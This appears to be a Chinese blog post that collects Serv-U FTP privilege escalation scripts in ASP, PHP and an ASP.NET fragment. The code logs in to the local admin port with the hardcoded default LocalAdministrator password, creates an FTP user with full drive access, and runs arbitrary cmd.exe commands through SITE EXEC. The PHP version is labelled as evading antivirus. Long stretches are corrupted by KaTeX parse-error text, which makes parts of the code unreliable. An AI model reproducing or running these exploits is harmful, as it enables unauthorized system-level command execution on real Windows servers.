渗透的常见术语

脚本：网站的编辑语言

serv-u利用脚本(asp/aspx/php)
serv-u利用脚本(asp/aspx/php)

每次用都得搜,说不准那天就搜不到了,直接存起来是最好的选择.

<%@ LANGUAGE = VBScript %>
<%
'Serv-U asp 提权程序
'author: Goldsun[at]84823714
'DO NOT use it to do evil things!

Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
dim action
action=request(“action”)
if not isnumeric(action) then response.end
user = trim(request(“u”))
pass = trim(request(“p”))
port = trim(request(“port”))
cmd = trim(request(“c”))
f=trim(request(“f”))
if f="" then
f=gpath()
else
f=left(f,2)
end if
ftpport = 65500
timeout=3

loginuser = “User " & user & vbCrLf
loginpass = “Pass " & pass & vbCrLf
deldomain = “-DELETEDOMAIN” & vbCrLf & “-IP=0.0.0.0” & vbCrLf & " PortNo=” & ftpport & vbCrLf
mt = “SITE MAINTENANCE” & vbCrLf
newdomain = “-SETDOMAIN” & vbCrLf & “-Domain=goldsun|0.0.0.0|” & ftpport & “|-1|1|0” & vbCrLf & “-TZOEnable=0” & vbCrLf & " TZOKey=” & vbCrLf
newuser = “-SETUSERSETUP” & vbCrLf & “-IP=0.0.0.0” & vbCrLf & “-PortNo=” & ftpport & vbCrLf & “-User=go” & vbCrLf & “-Password=od” & vbCrLf & _
“-HomeDir=c://” & vbCrLf & “-LoginMesFile=” & vbCrLf & “-Disable=0” & vbCrLf & “-RelPaths=1” & vbCrLf & _
“-NeedSecure=0” & vbCrLf & “-HideHidden=0” & vbCrLf & “-AlwaysAllowLogin=0” & vbCrLf & “-ChangePassword=0” & vbCrLf & _
“-QuotaEnable=0” & vbCrLf & “-MaxUsersLoginPerIP=-1” & vbCrLf & “-SpeedLimitUp=0” & vbCrLf & “-SpeedLimitDown=0” & vbCrLf & _
“-MaxNrUsers=-1” & vbCrLf & “-IdleTimeOut=600” & vbCrLf & “-SessionTimeOut=-1” & vbCrLf & “-Expire=0” & vbCrLf & “-RatioUp=1” & vbCrLf & _
“-RatioDown=1” & vbCrLf & “-RatiosCredit=0” & vbCrLf & “-QuotaCurrent=0” & vbCrLf & “-QuotaMaximum=0” & vbCrLf & _
“-Maintenance=System” & vbCrLf & “-PasswordType=Regular” & vbCrLf & “-Ratios=None” & vbCrLf & " Access=c://|RWAMELCDP" & vbCrLf
quit = “QUIT” & vbCrLf
newuser=replace(newuser,“c:”,f)
select case action
case 1
set a=Server.CreateObject(“Microsoft.XMLHTTP”)
a.open “GET”, “http://127.0.0.1:” & port & “/goldsun/upadmin/s1”,True, “”, “”
a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
set session(“a”)=a
%>

<% case 3 set c=Server.CreateObject("Microsoft.XMLHTTP") c.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", "" c.send loginuser & loginpass & mt & deldomain & quit set session("c")=c %> 提权完毕,已执行了命令：
<%=cmd%>

<%
case else
on error resume next
set a=session(“a”)
set b=session(“b”)
set c=session(“c”)
a.abort
Set a = Nothing
b.abort
Set b = Nothing
c.abort
Set c = Nothing
%>

Serv-U 提升权限 ASP版 Goldsun[at]84823714
用户名:
口　令：
端　口：
系统路径：
命　令：

　 <% end select function Gpath() on error resume next err.clear set f=Server.CreateObject("Scripting.FileSystemObject") if err.number>0 then gpath="c:" exit function end if gpath=f.GetSpecialFolder(0) gpath=lcase(left(gpath,2)) set f=nothing end function Function GName() If request.servervariables("SERVER_PORT")="80" Then GName="http://" & request.servervariables("server_name")&lcase(request.servervariables("script_name")) Else GName="http://" & request.servervariables("server_name")&":"&request.servervariables("SERVER_PORT")&lcase(request.servervariables("script_name")) End If End Function %> ============================================================================================ <?PHP /** 注释免杀版本 **/ // //Codez begin // //判断magic_quotes_gpc的值 if (get_magic_quotes_gpc()) { $_GET = stripslashes_array($_GET); }

//变量初始化
$addr = ‘0.0.0.0’;
$ftpport = 21;
$adminport = 43958;
$adminuser = ‘LocalAdministrator’;
KaTeX parse error: Expected 'EOF', got '#' at position 14: adminpass = '#̲l@ak#.lk;0@P’;
$user = ‘wofeiwo’;
$password = ‘wrsky’;
$homedir = ‘C://’;
$dir = ‘C://WINNT//System32//’;

//有改变则赋值
if ($_GET){
$addr = $_GET[‘addr’] ;
$ftpport = $_GET[‘ftpport’] ;
$adminport = $_GET[‘adminport’] ;
$adminuser = $_GET[‘adminuser’] ;
$adminpass = $_GET[‘adminpass’] ;
$user = $_GET[‘user’] ;
$password = $_GET[‘password’] ;
$homedir = ${}_{G}ET{[}^{\prime }homedi{r}^{\prime }];if($_GET[‘dir’]){
$dir = $_GET[‘dir’] ;
}
}
?>

Serv-U All Version本地提升权限Exp10it Ver 1.5

添加Serv-U用户部分

主机IP：
主机Ftp端口：
主机Ftp管理端口：
主机Ftp管理用户：
主机Ftp管理密码：
添加的用户名：
添加的用户名密码：
用户主目录(别忘了写"/")：

---

命令回显: <?php

//添加用户
if (KaTeX parse error: Expected '}', got 'EOF' at end of input: …n']=="up"){ up(addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir);
}
?>

---

执行命令部分

主机Ftp端口：
用户名：
用户名密码：
系统路径(别忘了写"/")：
执行的命令：

---

命令回显: <?php

//执行命令
if (KaTeX parse error: Expected '}', got 'EOF' at end of input: …cute"){ ftpcmd(ftpport,$user,$password,$dir,$_GET[‘cmd’]);
}
?>

---

Copycenter (C) 2004 我非我 All centers Reserved.
<?php

//添加用户主函数定义
function up($addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir){
$fp = fsockopen (“127.0.0.1”, $adminport, $errno, $errstr,8);if(!$fp) {
echo “$errstr($errno)
/n”;
} else {
fputs ($fp,"USER".$adminuser."/r/n");
sleep (1);
fputs ($fp,"PASS".$adminpass."/r/n");
sleep (1);
fputs ($fp,"SITEMAINTENANCE/r/n");sleep(1);fputs($fp, “-SETUSERSETUP/r/n”);
fputs ($fp,"-IP=".$addr."/r/n");
fputs ($fp,"-PortNo=".$ftpport."/r/n");
fputs ($fp,"-User=".$user."/r/n");
fputs ($fp,"-Password=".$password."/r/n");
fputs ($fp,"-HomeDir=".$homedir."/r/n");
fputs ($fp,"-LoginMesFile=/r/n");fputs($fp, “-Disable=0/r/n”);
fputs ($fp,"-RelPaths=0/r/n");fputs($fp, “-NeedSecure=0/r/n”);
fputs ($fp,"-HideHidden=0/r/n");fputs($fp, “-AlwaysAllowLogin=0/r/n”);
fputs ($fp,"-ChangePassword=1/r/n");fputs($fp, “-QuotaEnable=0/r/n”);
fputs ($fp,"-MaxUsersLoginPerIP=-1/r/n");fputs($fp, “-SpeedLimitUp=-1/r/n”);
fputs ($fp,"-SpeedLimitDown=-1/r/n");fputs($fp, “-MaxNrUsers=-1/r/n”);
fputs ($fp,"-IdleTimeOut=600/r/n");fputs($fp, “-SessionTimeOut=-1/r/n”);
fputs ($fp,"-Expire=0/r/n");fputs($fp, “-RatioUp=1/r/n”);
fputs ($fp,"-RatioDown=1/r/n");fputs($fp, “-RatiosCredit=0/r/n”);
fputs ($fp,"-QuotaCurrent=0/r/n");fputs($fp, “-QuotaMaximum=0/r/n”);
fputs ($fp,"-Maintenance=System/r/n");fputs($fp, “-PasswordType=Regular/r/n”);
fputs ($fp,"-Ratios=None/r/n");fputs($fp, " Access=".$homedir."|RWAMELCDP/r/n");fputs($fp, “QUIT/r/n”);
sleep (1);
while (!feof(KaTeX parse error: Expected '}', got 'EOF' at end of input: … { echo fgets (fp,128);
}

}
}

//执行命令主函数定义
function ftpcmd($ftpport,$user,$password,$dir,$cmd){

$conn_id = fsockopen (“127.0.0.1”, $ftpport, $errno, $errstr, 8);

if (!KaTeX parse error: Expected '}', got 'EOF' at end of input: …nn_id) { echo "errstr (KaTeX parse error: Expected 'EOF', got '}' at position 16: errno)<br>/n"; }̲ else { fputs (conn_id, "USER ".$user."/r/n");sleep(1);fputs($conn_id, "PASS ".$password."/r/n");sleep(1);fputs($conn_id, “SITE EXEC “.$dir."cmd.exe/c".$cmd.”/r/n”);
fputs ($con{n}_{i}d,"QUIT/r/n");sleep(1);while(!feof($conn_id)) {
echo fgets (KaTeX parse error: Expected 'EOF', got '}' at position 15: conn_id,128); }̲ fclose(conn_id);
}
}

//去除转义字符
function stripslashes_array(&KaTeX parse error: Expected '}', got 'EOF' at end of input: … { while (list(key,$var)=each($array)) {
if ($key != ‘argc’ && KaTeX parse error: Expected 'EOF', got '&' at position 15: key != 'argv' &̲& (strtoupper(key) != $key|{|}^{\prime \prime }.intval($key) == "KaTeX parse error: Expected '}', got 'EOF' at end of input: … if (is_string(var)) {
$array[$key] = stripslashes(KaTeX parse error: Expected 'EOF', got '}' at position 7: var); }̲ if (is_array(var)) {
$array[$key] = stripslashes_array($var);
}
}
}
return $array;
}
?>

<%@ Page Language=“VB” Debug=“true” %>
<%@ import Namespace=“System.Net.Sockets” %>

from Serv-U 2 admin by lake2

Name LocalAdministrator
PWD #l@$ak#.lk;0@P
Port 43958
cmd

---